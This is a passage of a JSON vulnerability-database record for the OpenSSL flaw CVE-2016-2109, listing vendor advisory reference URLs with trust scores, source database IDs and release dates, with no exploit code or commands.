        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00008.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00011.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00030.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.debian.org/security/2016/dsa-3566"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1035721"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00055.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00019.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2016\u0026m=slackware-security.542103"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00013.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00001.html"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf"
      },
      {
        "trust": 1.1,
        "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=c62981390d6cf9e3d612c489b8b77c2913b25807"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2109"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu93163809/"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu94844193/"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2109"
      },
      {
        "trust": 0.8,
        "url": "http://www.aratana.jp/security/detail.php?id=16"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2176"
      },
      {
        "trust": 0.6,
        "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=c62981390d6cf9e3d612c489b8b77c2913b25807"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0696"
      },
      {
        "trust": 0.6,
        "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887855"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2148/"
      },
      {
        "trust": 0.4,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05320149"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1330101"
      },
      {
        "trust": 0.3,
        "url": "https://git.openssl.org/?p=openssl.git;a=commitdiff;h=c62981390d6cf9e3d612c489b8b77c2913b25807"
      },
      {
        "trust": 0.3,
        "url": "http://openssl.org/"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2016/may/25"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023779"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023814"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024078"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024319"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024507"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000158"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021361"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021376"
      },
      {
        "trust": 0.3,
        "url": "https://securityadvisories.paloaltonetworks.com/home/detail/56?aspxautodetectcookiesupport=1"
      },
      {
        "trust": 0.3,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987903"
      },
      {
        "trust": 0.3,
        "url": "https://support.asperasoft.com/hc/en-us/articles/229505687-security-bulletin-multiple-openssl-vulnerabilities-affect-ibm-aspera-shares-1-9-2-or-earlier-%20-ibm-aspera-console-3-0-6-or-earlier"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024066"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988007"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009147"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983158"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984323"
      },
      {
        "trust": 0.3,
        "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21984483"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984583"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984609"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984794"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984920"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984977"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985736"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986068"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986123"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986152"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986260"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986473"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986506"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986563"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986564"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986669"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987671"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987779"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987968"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988055"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988071"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988189"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988350"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988383"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988976"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21989046"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992493"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000192"
      },
      {
        "trust": 0.3,
        "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory20.asc"
      },
      {
        "trust": 0.3,
        "url": "http://www.hpe.com/support/security_bulletin_archive"
      },
      {
        "trust": 0.3,
        "url": "https://www.hpe.com/info/report-security-vulnerability"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
      },
      {
        "trust": 0.3,
        "url": "http://www.hpe.com/support/subscriber_choice"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-2109"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-2107"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-2106"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-2105"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-2842"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-0799"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-2108"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1836"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/399.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2016-2109"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2016:2073"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/2959-1/"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49332"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03756en_us"
      },
      {
        "trust": 0.1,
        "url": "https://www.freebsd.org/handbook/makeworld.html\u003e."
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-16:17/openssl-9.patch.asc"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/\u003e."
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-16:17/openssl-9.patc"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-16:17/openssl-10.patch"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2105\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2106\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2176\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://www.openssl.org/news/secadv/20160503.txt\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://svnweb.freebsd.org/base?view=revision\u0026revision=nnnnnn\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/advisories/freebsd-sa-16:17.openssl.asc\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://security.freebsd.org/patches/sa-16:17/openssl-10.patch.asc"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2109\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2107\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2105"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2183"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2107"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2178"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2176"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7052"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6304"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6305"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2106"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2108"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-7052"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2109"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304"
      },
      {
        "trust": 0.1,
        "url": "http://eprint.iacr.org/2016/594.pdf"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2180"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2177"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6306"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2107"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2176"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com"
      },
      {
        "trust": 0.1,
        "url": "http://osuosl.org)"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2108"
      },
      {
        "trust": 0.1,
        "url": "http://slackware.com/gpg-key"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2105"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2106"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2842"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5387"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4393"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4396"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4537"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3739"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4395"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4542"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4538"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5385"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4070"
      },
      {
        "trust": 0.1,
        "url": "https://www.hpe.com/us/en/product-catalog/detail/pip.344313.html\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4072"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4071"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4343"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4543"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4541"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4394"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4539"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4540"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5388"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4342"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03765en_us"
      },
      {
        "trust": 0.1,
        "url": "http://h20565.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-a00006123en_"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0718"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4599"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4601"
      },
      {
        "trust": 0.1,
        "url": "https://gpgtools.org"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4449"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4483"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4600"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1865"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4597"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4596"
      },
      {
        "trust": 0.1,
        "url": "http://www.apple.com/support/downloads/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4447"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1863"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4582"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4595"
      },
      {
        "trust": 0.1,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1864"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9862"
      },
      {
        "trust": 0.1,
        "url": "http://support.apple.com/kb/ht201222"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4607"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4448"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4598"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1684"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4602"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/kb/ht206900"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4594"
      },
      {
        "trust": 0.1,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-0705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-3196"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4448"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3216"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-0702"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0797"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-8176"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-6808"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1835"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en/red-hat-jboss-core-services-apache-http-server/version-2.4.23/apache-http-server-2423-release-notes/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-3705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1838"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3196"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1839"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2177"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4483"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3523"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-8612"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1148"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1840"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-0797"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3185"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0705"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-3185"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-3194"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1833"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=distributions\u0026version=2.4.23"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8176"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1840"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1836"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1762"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1835"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4449"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-0286"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1762"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-5420"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-2178"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-3627"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2012-1148"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1837"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-1834"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1837"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1839"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-5419"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4459"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-0209"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-3195"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0702"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-3216"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1838"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1833"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1834"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4447"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-7141"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2016-2109"
      },
      {
        "db": "BID",
        "id": "87940"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002476"
      },
      {
        "db": "PACKETSTORM",
        "id": "142803"
      },
      {
        "db": "PACKETSTORM",
        "id": "136919"
      },
      {
        "db": "PACKETSTORM",
        "id": "140056"
      },
      {
        "db": "PACKETSTORM",
        "id": "136912"
      },
      {
        "db": "PACKETSTORM",
        "id": "136958"
      },
      {
        "db": "PACKETSTORM",
        "id": "136893"
      },
      {
        "db": "PACKETSTORM",
        "id": "139379"
      },
      {
        "db": "PACKETSTORM",
        "id": "143513"
      },
      {
        "db": "PACKETSTORM",
        "id": "137958"
      },
      {
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-083"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2109"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2016-2109"
      },
      {
        "db": "BID",
        "id": "87940"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002476"
      },
      {
        "db": "PACKETSTORM",
        "id": "142803"
      },
      {
        "db": "PACKETSTORM",
        "id": "136919"
      },
      {
        "db": "PACKETSTORM",
        "id": "140056"
      },
      {
        "db": "PACKETSTORM",
        "id": "136912"
      },
      {
        "db": "PACKETSTORM",
        "id": "136958"
      },
      {
        "db": "PACKETSTORM",
        "id": "136893"
      },
      {
        "db": "PACKETSTORM",
        "id": "139379"
      },
      {
        "db": "PACKETSTORM",
        "id": "143513"
      },
      {
        "db": "PACKETSTORM",
        "id": "137958"
      },
      {
        "db": "PACKETSTORM",
        "id": "140182"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-083"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2109"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-05-05T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-2109"
      },
      {
        "date": "2016-04-26T00:00:00",
        "db": "BID",
        "id": "87940"
      },
      {
        "date": "2016-05-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-002476"
      },
      {
        "date": "2017-06-05T18:18:00",
        "db": "PACKETSTORM",
        "id": "142803"
      },
      {
        "date": "2016-05-05T16:11:49",
        "db": "PACKETSTORM",
        "id": "136919"
      },
      {
